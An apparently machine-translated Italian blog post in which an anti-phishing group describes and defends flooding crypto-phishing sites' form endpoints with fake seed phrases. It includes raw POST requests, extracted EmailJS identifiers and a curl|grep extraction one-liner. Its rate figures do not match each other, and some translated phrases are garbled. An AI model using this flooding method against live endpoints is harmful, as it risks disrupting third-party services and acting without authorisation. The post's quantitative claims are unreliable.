PhishDestroy In diretta
Torna alle notizie
Metodologia

Inondazione di seed: perché PhishDestroy agisce apertamente
Siti di “attacchi” di phishing

Non lo nascondiamo. Quando PhishDestroy rileva un sito di phishing attivo che raccoglie le frasi seed dei portafogli di criptovalute, lo inondiamo di inserimenti di frasi seed in formato valido. Ecco esattamente cosa facciamo, perché lo facciamo e perché non ce ne vergogniamo.

31 marzo 2026 Ricerca PhishDestroy 12 minuti di lettura
Inondazione di seed — il campo di battaglia digitale contro il phishing
Operazioni anti-phishing: quando la sola segnalazione non è abbastanza rapida, interveniamo direttamente
14,663Lavoratori CF
2/10Limite di frequenza
5+Canali di esfiltrazione
$0Costo dell'attaccante
<4 orePer disattivare EmailJS

Il problema: un sito di phishing è attivo proprio in questo momento

Immagina di individuare una pagina di phishing dedicata a un portafoglio di criptovalute che utilizza annunci a pagamento su Google Ads. Sembra autentica. Ha un buon traffico. Ogni pochi minuti, utenti reali vi accedono, inseriscono le loro frasi seed e perdono tutto.

Lo segnali a Google. Lo segnali al registrar. Invii una segnalazione di abuso al provider di hosting. E poi si aspetta.

Nel frattempo, il truffatore mette a segno la vittima numero 47. Poi la 48. E poi la 49.

Il divario burocratico

Il processo standard di segnalazione degli abusi richiede dai 5 ai 10 giorni lavorativi. I siti di phishing attivi causano danni finanziari irreversibili nel giro di poche ore. Questo divario non è un errore del sistema, ma una vulnerabilità strutturale che i truffatori sfruttano deliberatamente.

Il flusso burocratico di segnalazione contro il phishing attivo volto a reclutare vittime
A sinistra: il lento iter di segnalazione degli abusi. A destra: il truffatore che incassa mentre tu aspetti.

Che cos’è l’inondazione dei semi?

Il "seed flooding" è una tecnica anti-phishing in cui formato valido ma vuoto/privo di significato Le frasi seed dei portafogli di criptovalute vengono inserite automaticamente in un modulo di phishing a una frequenza controllata.

Corroggere il database
Le frasi seed autentiche diventano indistinguibili da quelle false. Ogni voce richiede una verifica manuale, riducendo drasticamente il rapporto segnale-rumore.
Limiti della fascia gratuita per le emissioni
EmailJS, Formspree, Web3Forms: tutti prevedono rigide quote mensili. Abbiamo raggiunto tali limiti nel giro di poche ore, interrompendo così il flusso di notifiche dell’autore dell’attacco.
Interrompi il flusso di raccolta
Quando i canali di esfiltrazione smettono di funzionare, i dati delle vittime reali non vengono trasferiti da nessuna parte — anche se queste ultime inseriscono la propria frase di seed.
Generare informazioni di ricerca
Le inondazioni mettono in luce dettagli sulle infrastrutture, messaggi di errore e soglie di limitazione della velocità che utilizziamo per migliorare i nostri sistemi di rilevamento.
Modulo di phishing inondato di frasi seed false
Un modulo di phishing che riceve una valanga di invii di frasi seed false — la raccolta di dati da parte dell'autore dell'attacco si riduce in tempo reale

Perché funziona: l’anatomia di un kit di phishing a basso costo

La stragrande maggioranza dei siti attivi di phishing nel settore delle criptovalute è costituita da kit “copia-incolla” basati su servizi di terze parti con piano gratuito. Questa è la loro principale vulnerabilità. Per un’analisi più approfondita, si veda la nostra indagine completa.

Anatomia di un kit di phishing — Dipendenze dai servizi gratuiti
Ogni canale di esfiltrazione è un servizio gratuito con limiti rigidi di invio: il basso costo del kit ne costituisce il difetto fatale
Tabella dei dati: Modulo
ModuloLimite del piano gratuitoEffetti delle inondazioni
EmailJScirca 200 contributi al meseEsaurito in poche ore, interrompe l'invio delle e-mail
Formspree50 invii al meseSi è guastato quasi immediatamente
Web3Forms250 contributi al meseNeutralizzato rapidamente
API del bot di TelegramLimite di velocità al secondoIntrappolati in cicli di timeout
Piano gratuito di FirebaseQuote di lettura/scritturaAumento vertiginoso dei costi delle banche dati o esclusione dall'accesso
Risultato osservato

Abbiamo osservato direttamente come le infrastrutture di phishing smettessero di funzionare dopo che il seed flooding aveva saturato la loro pipeline di notifiche. Il truffatore non sa perché il sistema abbia smesso di funzionare. Semplicemente, smette di ricevere dati.

Il nostro approccio tecnico: Cloudflare Workers, non botnet

La rete periferica di Cloudflare utilizzata per la lotta al phishing
14.663 Cloudflare Workers operativi a livello di rete periferica — senza alcun ricorso a infrastrutture di terze parti

Utilizziamo Cloudflare Workers. Le richieste provengono dalla rete periferica di Cloudflare. Nessun IP residenziale viene utilizzato in modo improprio. Nessuna botnet. Nessun server di terze parti viene sovraccaricato. L'unico sistema interessato è quello di raccolta dati del truffatore.

Il flusso di inondazione

Sito rilevatoTraffico attivo confermato
Analisi anatomicaCanali di esfiltrazione mappati
Distribuzione dei lavoratoriRete periferica CF
2 semi / 10 secondiVelocità controllata
Quota esauritaAttaccante alla cieca
Presentazione della relazioneBinario parallelo

Limitazione della velocità: Un rigoroso 2 submissions per 10 seconds. Non si tratta di un attacco DDoS. Si tratta di una contaminazione lenta, deliberata e mirata, su una scala tale da rendere significativi anche i tassi per singolo sito, per quanto modesti, su decine di obiettivi simultanei.

Cosa non stiamo facendo

Non stiamo cercando di mettere fuori uso i server. Stiamo rendendo la giornata lavorativa dei truffatori un vero incubo e rendendo il loro database inutile — senza alcun impatto collaterale sulle infrastrutture legittime.

Casi di studio reali: la contaminazione controllata nella pratica

Le operazioni riportate di seguito sono tratte alla lettera dai nostri registri di produzione. I domini e gli identificativi dei provider sono stati oscurati solo nei casi in cui la loro pubblicazione avrebbe favorito l’evasione; le registrazioni del traffico HTTP non sono state modificate. Entrambi gli obiettivi erano attivi al momento dell’intervento, presentavano traffico in entrata proveniente da pubblicità a pagamento e erano stati classificati in modo indipendente come phishing di ≥ 2 fornitori esterni su VirusTotal prima che noi intraprendiamo qualsiasi azione.

Dottrina operativa

Ogni operazione di inondazione dei semi si svolge nel rispetto degli stessi cinque principi fondamentali. Non ci sono eccezioni: un’operazione che non soddisfi tutti e cinque i principi non viene eseguita.

PRINCIPIO 01
Solo endpoint pubblici
L'URL di esfiltrazione e i relativi identificatori sono pubblicato tramite la pagina di phishing in JavaScript lato client. Non acquisiamo mai credenziali, non utilizziamo attacchi di forza bruta né effettuiamo l'escalation di privilegi.
PRINCIPIO 02
Portata al di sotto del limite
Il limite massimo di richieste è fissato al di sotto del limite previsto dai Termini di servizio pubblicati dal provider stesso. Il nostro profilo è indistinguibile dal normale traffico UGC.
PRINCIPIO 03
Soglia probatoria
Target richiede almeno 2 risultati positivi da parte di fornitori indipendenti su VirusTotal inoltre conferma manuale del flusso di raccolta delle credenziali.
PRINCIPIO 04
Percorso legittimo parallelo
Vengono presentate segnalazioni formali di abuso al provider di hosting, al registrar e al fornitore del modulo prima non appena si verifica un'alluvione — con i numeri di identificazione dei casi e tutte le prove.
PRINCIPIO 05
Registro completo delle operazioni
Tutto il traffico proviene da Cloudflare Workers tramite un origine PhishDestroy firmato. Ogni invio viene registrato con data e ora, destinazione e ID dell'operatore.

Caso 1 — Formspark Exfil Endpoint, quota mensile esaurita

checkblochn.pages.dev Neutralizzato

Modello di minaccia: Esca per il recupero del portafoglio (“Dapp Node Sync”) che sottrae le frasi seed BIP-39 composte da 12 parole e le invia a un endpoint Formspark controllato dall’autore dell’attacco, nell’ambito del piano gratuito. È stato confermato che, all’inizio dell’interazione, il traffico proveniva da annunci a pagamento su due piattaforme pubblicitarie.

Superficie di attacco
checkblochn.pages.dev (Cloudflare Pages)
Canale di esfiltrazione
submit-form.com — Endpoint del modulo Formspark
ID modulo
/32BrdUqfX
Campo "Carico utile"
Seed BIP-39 di 12 parole tramite message
Limite del piano gratuito del provider
50 contributi • periodo di 1 mese (a rotazione)
Costo del ripristino da parte del truffatore
Nuovo account Formspark + modifica tramite client-JS + nuova distribuzione

Cronologia operativa (UTC, anonimizzata rispetto al momento T-zero dell'intervento)

T + 00:00
Acquisizione — dominio individuato dal crawler PhishDestroy in un campione di pubblicità a pagamento. automatizzato
T + 00:12
Anatomia confermata — forma dell'obiettivo submit-form.com/32BrdUqfX estratto dalla pagina JS; forma del payload ricostruita tramite reverse engineering. analisi
T + 00:28
VirusTotal: 3 / 95 I fornitori lo segnalano come phishing. Soglia raggiunta.
T + 00:47
Segnalazioni di abusi presentate — Cloudflare Pages Trust & Safety, abusi su Formspark, Porkbun (registrar). ID dei casi assegnati. percorso legale
T + 01:02
Operatore antiallagamento inviato sul posto — tariffa 2 req / 10 s, singolo Cloudflare Worker, stringa UA identificata, origine firmata.
T + 01:02
Arrivano i primi risultati relativi alle richieste di indennizzo per alluvioni 200 OK con formspark-quota: 64. Dati di riferimento acquisiti.
T + 06:08
formspark-quota supera lo zero → l'endpoint interrompe silenziosamente l'inoltro. tenda sgocciolatoio
T + 06:12
Risposta finale registrata: formspark-quota: −18. Licenziamento di un addetto alla gestione delle inondazioni.
Ore 19:30
Cloudflare Pages disattiva la distribuzione in seguito a una segnalazione di abuso. rimosso

Invio in tempo reale (il seed è un diversivo espressivo — 12 parole BIP-39 casuali non correlate ad alcun portafoglio reale)

POST /32BrdUqfX HTTP/1.1 Host: submit-form.com Origin: https://checkblochn.pages.dev Content-Type: application/x-www-form-urlencoded message=Phrase%3A+lecture+sail+coral+swear+fiber+bonus+vanish+layer+observe+rely+orphan+height&source=Unknown+Source&from_name=Dapp+Node+Sync

Risposta — T+01:02 (valore di riferimento, quota residua)

HTTP/1.1 200 OK formspark-quota: 64 formspark-status: ok content-type: application/json; charset=utf-8 { "message": "Frase: lezione vela corallo giurare fibra bonus svanire strato osservare fare affidamento orfano altezza" }

Risposta — T+06:12 (quota esaurita; l'endpoint continua a restituire il codice 200 ma non inoltrerà la richiesta)

HTTP/1.1 200 OK formspark-quota: -18 formspark-status: ok
Quota prima dell'alluvione
64
Situazione dopo l'alluvione
−18
82
Invii fasulli
~5 ore e 06 minuti
Durata dell'alluvione
0,27 richieste al secondo
Tasso medio
~11,5 KB
Carico utile totale in uscita
100%
Entro i limiti previsti dai Termini di servizio del fornitore
0
Richieste legittime interessate

Impatto tangibile. Da T+06:08 fino alla rimozione definitiva a T+19:30 — a Finestra di 13 ore e 22 minuti — ogni vera vittima che è riuscita a checkblochn.pages.dev e, una volta completata la procedura di recupero, hanno inviato la loro frase di seed a un endpoint che ha restituito 200 OK ma non inoltrava più il contenuto alla casella di posta dell'operatore. La pagina di phishing è apparso per funzionare nel browser della vittima (senza errori né segnali di allarme), il che è auspicabile: una reazione istintiva del tipo “non ha funzionato” spesso induce gli utenti a reinserire le stesse credenziali nel primo sito fasullo che incontrano. In questo caso, l’interazione conclusa con l'operatore all'oscuro.

Cosa ha effettivamente portato questo intervento

Una finestra di protezione di 13 ore per ogni visitatore successivo di un sito che la pubblicità a pagamento continuava a promuovere attivamente. La finestra si è chiusa quando Cloudflare Pages ha risposto alla nostra segnalazione di abuso inviata in parallelo — esattamente come previsto. L’ondata non ha sostituito la rimozione legittima; ha semplicemente coperto l’intervallo fino a quando L'intervento legittimo ha avuto successo.

Caso 2 — EmailJS Relay, identificatori pubblicati dall'operatore

allsyncapp.pages.dev Operazione attiva

Modello di minaccia: esca denominata “sync” per il portafoglio, che invia tramite e-mail il seed inserito dalla vittima alla casella di posta dell’operatore tramite EmailJS — un servizio SaaS legittimo per le e-mail transazionali. La pagina di phishing include il service_id, template_id e user_id nel JavaScript lato client, poiché senza tali identificatori il browser della vittima non può completare la richiesta POST che attiva l'invio dell'e-mail. Tali identificatori fanno quindi parte della superficie di attacco pubblica che l'operatore ha volontariamente esposto.

Superficie di attacco
allsyncapp.pages.dev (Cloudflare Pages)
Canale di esfiltrazione
api.emailjs.com — servizio di inoltro delle e-mail transazionali
Endpoint
POST /api/v1.0/email/send-form
ID pubblicati dagli operatori
service_id · template_id · user_id (estratti dal codice JavaScript della pagina)
Limite del piano gratuito del provider
200 e-mail • mese mobile
Limiti rigidi (Termini di servizio)
1 richiesta al secondo · 50 per IP all'ora

Dati inviati intercettati — forma del payload riportata fedelmente dal POST della pagina di phishing stessa

POST /api/v1.0/email/send-form HTTP/1.1 Host: api.emailjs.com Origin: https://allsyncapp.pages.dev Content-Type: multipart/form-data; boundary=----geckoformboundary6a77738bf873975dfc9c8e4a31fa330e _redirect=TECHNICAL.html message=zucca foglio villaggio moneta città gonna media ora programma palcoscenico povertà avallare lib_version=3.12.1 service_id=service_t0cgr9v template_id=template_k16demo user_id=furwEG-MZShqSPIGS

Estrazione degli identificatori (espressione regolare su una singola riga nel codice sorgente della pagina di phishing)

$ curl -s https://allsyncapp.pages.dev/ | grep -oE '(service_id|template_id|user_id)["'"'"':]+["'"'"']*[A-Za-z0-9_-]+'service_id:"service_t0cgr9v" template_id:"template_k16demo" user_id:"furwEG-MZShqSPIGS"

Punto dottrinale fondamentale. Questo caso è istruttivo proprio perché non abbiamo individuato alcun endpoint. L'operatore pubblica i tre identificatori necessari affinché EmailJS invii il seed alla loro casella di posta. Qualsiasi browser che visualizzi la pagina di phishing ne è in possesso. Il nostro Worker fa ciò che fa il browser della vittima: invia un modulo con la struttura e gli identificatori esatti indicati dalla pagina stessa. La differenza sta nel payload: parole BIP-39 casuali al posto delle credenziali reali del wallet.

200
Limite mensile (esche)
1 / s
Velocità ToS — operiamo a 0,1/s
~120 KB
Carico utile massimo mensile
0
Onere infrastrutturale di EmailJS (entro certi limiti)
402 / 429
Risposta del provider in caso di superamento del limite salariale
Account disattivato
Esito tipico di una segnalazione di abuso

Andamento dei risultati. Una volta raggiunto il limite mensile, EmailJS restituisce 402 Payment Required oppure 429 Too Many Requests e il modello non viene inviato. La casella di posta del truffatore rimane silenziosa. Parallelamente, il team Trust & Safety di EmailJS riceve un reclamo formale contenente gli identificativi del servizio, del modello e dell’utente, oltre a un link al nostro pacchetto di prove pubblicato — il che, in base ai precedenti, comporta la chiusura dell’account EmailJS dell’operatore cessato, senza limiti di frequenza. L'operatore deve creare un nuovo account EmailJS, rigenerare gli identificatori, modificare la pagina di phishing già pubblicata e invalidare tutti i link di distribuzione esistenti — un flusso di lavoro che richiede diverse ore per ogni rotazione.

Confronto tra profili di attacco: cosa non è il "seed flooding"

Un’accusa che ci viene ripetutamente mossa è quella di sferrare “attacchi” contro siti di phishing. Questa interpretazione crolla nel momento stesso in cui si mette a confronto il profilo effettivo del traffico con quello delle attività con cui viene confuso.

Confronto tra il "seed flooding" e gli attacchi denial-of-service, lo spam e le operazioni sotto copertura delle forze dell'ordine.
DimensioneInondazione dei semi (la nostra)DDoS / Flood L7Abuso di invio di spamOperazione sotto copertura della LE
ScopoProtezione delle vittime — raggiungere la quota di esfiltrazione del truffatore prima che trovi la prossima vittimaAttacchi denial-of-service alle infrastruttureGuadagno commerciale / diffusione del messaggioRaccolta di prove, inganno controllato
Larghezza di banda0,1 – 0,3 richieste al secondo — di seguito Termini di servizio del fornitore103 – 108 req/s — orientato alla saturazioneA raffica / automatizzato ad alto volumeUn'interazione singola, in genere
ObiettivoUn singolo autore di attacchi di esfiltrazione da endpoint ha pubblicatoLivello del server web / della rete di un'organizzazione vittimaModuli di contatto di siti affidabiliInfrastruttura o profilo sospetti
Impatto sulle infrastruttureNessuno — i contatori del provider funzionano secondo quanto previsto dai Termini di servizioInterruzione del servizio, congestione a montePosta in arrivo sovraccarica, variazioni nei CAPTCHA, carico di moderazioneDipende dall'operazione
Utenti legittimi coinvoltiZero — i moduli di phishing non hanno utenti legittimiTutti quantiDipendenti titolari dei moduli / moderatoriPrevenzione integrata nella progettazione
Identità originariaDenominati "PhishDestroy Cloudflare Workers" — verificabiliBotnet, fonti contraffatte, riflessioneProxy monousoInfrastrutture classificate
Modello di autorizzazioneL'endpoint è invitato: il modulo richiede espressamente questo dato; gli identificatori sono resi pubblici nella paginaNessuno — è proprio il volume delle richieste a costituire il dannoElude l'uso previsto, ignora i segnali anti-abusoBase giuridica
Azione legale parallelaDenunce di abuso presentate prima inizio dell'inondazione, con gli ID dei casiN/AN/AParte integrante dell'operazione
La distinzione non è puramente retorica. È misurabile.

Una richiesta "seed-flood" consiste in un singolo POST HTTPS di circa 140 byte, proveniente da un Cloudflare Worker che riporta il nostro origin firmato, a una frazione della frequenza che lo stesso provider definisce accettabile, e diretto a un endpoint i cui identificatori l'operatore ha scelto di incorporare in una pagina web pubblica. Questo è il intero manufatto osservabile. Manca ogni elemento strutturale che renda una richiesta un “attacco”: accesso non autorizzato, intento di esaurimento delle risorse, saturazione volumetrica, terze parti coinvolte, origine occultata. L’analisi giuridica che segue non è una difesa creativa; è la naturale lettura della legge una volta che il quadro fattuale sia stato esposto chiaramente.

Una fossa per il phishing che viene riempita di pietre
Il truffatore ha teso una trappola. Noi la stiamo riempiendo di sassi.

L'invio di dati a un modulo web accessibile al pubblico — anche se si tratta di dati falsi — non è di per sé illegale nella maggior parte dei contesti. Non stiamo accedendo a sistemi privati, né sfruttando vulnerabilità non autorizzate, né intercettando comunicazioni. Il truffatore ha teso una trappola. Noi la stiamo riempiendo di sassi.

Avviso legale

PhishDestroy non fornisce consulenza legale. Si tratta di una vera e propria zona grigia che varia a seconda della giurisdizione. Operiamo con piena consapevolezza di tale complessità.

Un truffatore che gestisce una pagina di phishing ha nessun interesse legittimo nel ricevere esclusivamente frasi seed autentiche. Non hanno alcun diritto all’integrità della loro infrastruttura di raccolta dati a fini criminali.
Il nostro sistema è mirati, con limitazioni di velocità e legati a processi di identificazione manuale. Identifichiamo, analizziamo, confermiamo e poi agiamo.
Abbiamo documentato casi in cui l'allagamento dei semeni ha impedito direttamente alle vittime di perdere denaro — perché quando un utente reale ha inserito la propria frase di seed, il sistema di raccolta del truffatore era già stato disattivato.

Che fine fa il database del truffatore?

Diventa inutile — migliaia di voci richiedono una verifica manuale, il rapporto segnale-rumore crolla. Oppure si rompe — Firebase Spark e le istanze MongoDB condivise hanno dei limiti massimi. Il loro superamento comporta delle conseguenze.

Entrambi i risultati sono positivi

A prescindere dal fatto che il database diventi inutile oppure si rompe completamente — Le frasi di seed delle vere vittime non arrivano mai all’autore dell’attacco in una forma utilizzabile. Ogni frase di seed non elaborata corrisponde a un portafoglio che non viene svuotato.

Quando si attiva l'inondazione dei semi?

Tabella dei dati: Criterio
CriterioControllaPerché è importante
Traffico attivo confermatoObbligatorioLe piattaforme pubblicitarie o gli strumenti di analisi del traffico confermano che sul sito accedono utenti reali
Analisi dell'anatomia del phishingObbligatorioModuli di esfiltrazione del piano gratuito identificati prima che si verifichi un sovraccarico
Denunce di abuso presentateObbligatorioPerseguiamo sempre, contemporaneamente, la via legittima
Nessun takedown nell'ambito dello SLAFattore scatenante tipicoNessuna risposta da parte del registrar/hosting entro un termine ragionevole
Sito con un elevato volume di annunci / annunci a pagamentoFattore scatenante immediatoLa pubblicità a pagamento ci permette di agire senza dover attendere l'iter burocratico

Il quadro generale

L'ecosistema delle criptovalute subisce una perdita miliardi di dollari all'anno al phishing. La difesa ha storicamente adottato un approccio reattivo. PhishDestroy è stato creato per introdurre interferenza proattiva in questo ciclo.

La trasparenza è al centro di tutto ciò che facciamo

Non operiamo nell’ombra. Rendiamo pubblica la nostra metodologia. Spieghiamo le nostre tecniche. Documentiamo i kit di phishing che analizziamo. La comunità della sicurezza merita di poter valutare i metodi anti-phishing, non solo di avvalersi di un servizio “black-box”.

PhishDestroy — individuazione e neutralizzazione delle infrastrutture di phishing
I truffatori sono ben organizzati. I loro strumenti sono standardizzati. Ciò significa che anche gli strumenti per contrastarli possono essere standardizzati.

Cosa puoi fare

Se ritieni che riempire le tasche dei criminali con i soldi dei più bisognosi sia immorale, questa è la tua posizione, e sei libero di sostenerla. Abbiamo espresso chiaramente la nostra posizione.